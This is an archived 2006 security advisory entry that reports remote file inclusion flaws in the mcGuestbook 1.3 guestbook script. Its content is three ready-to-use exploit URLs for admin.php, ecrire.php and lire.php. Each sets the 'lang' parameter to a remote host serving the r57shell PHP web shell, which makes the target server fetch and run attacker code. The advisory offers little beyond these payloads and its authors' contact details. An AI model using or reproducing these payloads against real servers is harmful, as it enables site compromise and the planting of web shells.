file include exploits in mcGuestbook 1.3

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13176
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

Multiple file include exploits in mcGuestbook 1.3

script type : mcGuestbook 1.3
bug found by : sweet-devil team : site-down type : file include

exploits :

admin.php

http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?

ecrire.php

http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt?

lire.php

http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt?

emails:

gamr-14@hotmail.com & black-cod3@hotmail.com

All my respect to our friends , lezr.com

done .. peace